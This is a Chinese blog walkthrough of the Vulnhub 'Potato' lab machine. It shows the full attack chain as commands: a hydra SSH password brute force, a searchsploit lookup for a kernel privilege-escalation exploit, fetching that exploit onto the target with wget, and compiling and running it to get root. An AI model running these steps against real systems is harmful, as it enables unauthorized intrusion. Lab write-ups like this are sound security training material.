首页 > 其他分享 >Potato靶机

Potato靶机

时间:2025-01-06 18:04:08浏览次数:8  
标签:tmp 37292 potato Potato 192.168 exp 靶机 我们

靶机 ip:192.168.75.135

我们还是使用 arp-scan -l 查找 ip

第一步 信息收集

我们访问一下网页

只有一个土豆没有什么有用的信息

使用 dirb 扫描一下目录

得到了三个页面我们访问一下没有什么有用的信息

我们继续扫描一下端口

发现页面开启了 80 端口 还开启了 7120 端口(ssh)

结合刚才的网页是一个土豆,可以猜测一下,它的用户名就是potato,我们使用九头蛇来进行密码爆破试一下

hydra -l potato -P F:\Apt_Tools\Tools\暴力破解\密码字典\zi.txt -s 7120 -vV 192.168.75.
135 ssh

爆破到了

用户名:potato

密码:letmein

我们去登陆一下

ssh potato@192.168.75.135 -p 7120

这时我们成功登录

先查看下内核版本:

uname -a  

我们得到它得内核版本为 ubuntu 3.13.0-24-generic

我们去查一下他有什么漏洞

searchsploit ubuntu 3.13.0

我们下载第一个漏洞

searchsploit -p 37292.c

将找到的文件下载到 kali 中

cp /usr/share/exploitdb/exploits/linux/local/37292.c ./

用kali开启网站,让potato下载此漏洞

python -m http.server 80

先切到tmp目录下再下载,因为tmp目录是存放临时文件的目录

cd /tmp
wget http://192.168.75.128/37292.c

下载下来得.c 文件是不能使用的,需要使用 gcc 工具将.c 变为 exp 才可以使用

gcc 37292.c -o exp

下载并修改成功,我们现在给他修改一下权限 777

chmod 777 exp

我们运行一下 exp 得到了 root 权限

/tmp/exp

我们到 root 目录中查找 flag

cd /root
ls
cat	proof.txt

得到 flag

标签:tmp,37292,potato,Potato,192.168,exp,靶机,我们
From: https://blog.csdn.net/yjh20041010/article/details/144969125

相关文章

  • vulnhub靶机--potato
    nat模式打开靶机扫Ip访问IP得到一张土豆页面扫端口nmap-A-p-192.168.146.158发现80和7120端口使用的是ubuntu服务器访问7120端口扫目录爆破ssh7120端口hydrassh://192.168.146.158:7120-lpotato-P/usr/share/wordlists/john.lst-vV-f-t32......
  • HackMyVM-Alive靶机的测试报告
    目录一、测试环境1、系统环境2、使用工具/软件二、测试目的三、操作过程1、信息搜集2、Getshell3、主机探索/opt目录/vat/www/code的web渗透4、提权写入webshellUDF提权四、结论一、测试环境1、系统环境渗透机:kali2021.1(192.168.101.127)靶 机:debian(19......
  • vulnhub——Earth靶机
    使用命令在kali查看靶机iparp-scan-l尝试访问ip尝试使用御剑扫描子域名什么也没有尝试扫描端口nmap-Aip获得443端口的域名,以及dnsvim/etc/hostsearth.localterratest.earth.local尝试访问,在kali中访问dirb扫描一下发现子域名尝试访问一下ht......
  • HackMyVM-Airbind靶机的测试报告
    目录一、测试环境1、系统环境2、使用工具/软件二、测试目的三、操作过程1、信息搜集2、Getshell3、提权使用ipv6绕过iptables四、结论一、测试环境1、系统环境渗透机:kali2021.1(192.168.101.127)靶 机:debian(192.168.101.112)物理机:win11(192.168.101.241)......
  • 漫游 fristileaks-1-3 靶机
    Caputuretheflag!实验ipaddrnetdicover-r192.168.5.0/24扫描端口nmap-p-192.168.5.14480端口开放,访问web服务页面只有基本的信息,查看源码也是一样目录扫描dirsearch-u192.168.5.143dirb-u192.168.5.143-w/usr/share/wordlist/dirb/common.txt......
  • HackMyVM-Again靶机的测试报告
    目录一、测试环境1、系统环境2、使用工具/软件二、测试目的三、操作过程1、信息搜集2、Getshell3、提权四、结论一、测试环境1、系统环境渗透机:kali2021.1(192.168.101.127)靶 机:Linux(192.168.101.204)物理机:win11(192.168.101.241)靶机启动失败:设置中取......
  • Funbox2靶机(FTP匿名登录、压缩包密码枚举、ssh私钥文件利用)
    一、信息收集1.1.主机发现&端口扫描1.2.目录扫描1.3.敏感信息总结二、漏洞发现2.1.FTP匿名登录2.2.压缩包密码枚举2.3.ssh私钥文件利用2.4.提权三、结语一、信息收集1.1.主机发现&端口扫描nmap使用方法:一篇文章带你理解nmap的使用-nmap使用手册1.2.目录扫描......
  • HackMyVM-Adroit靶机的测试报告
    目录一、测试环境1、系统环境2、使用工具/软件二、测试目的三、操作过程1、信息搜集2、Getshell3、提权四、结论一、测试环境1、系统环境渗透机:kali2021.1(192.168.101.127)靶 机:debian(192.168.101.103)物理机:win11(192.168.101.241)2、使用工具/软件Kal......
  • 漫游 THM-ContainMe-v4 靶机
    Capturetheflag!一、信息收集确认主机ip,扫端口和服务,curl一下得到网页,扫描目录访问web相关页面二、撕口子经过基本的信息收集,暂时没什么思路,进一步观察web页面。查看index.php的源代码后发现提示说明此页面可能存在其他路径进行模糊测试wfuzz-c-w/usr......
  • HackMyVM-Adria靶机的测试报告
    目录一、测试环境1、系统环境2、使用工具/软件二、测试目的三、操作过程1、信息搜集2、Getshell3、提权四、结论一、测试环境1、系统环境渗透机:kali2021.1(192.168.101.127)靶 机:debian/linux(192.168.101.226)注意事项:该类型靶场只能在virtualBox上搭建,因......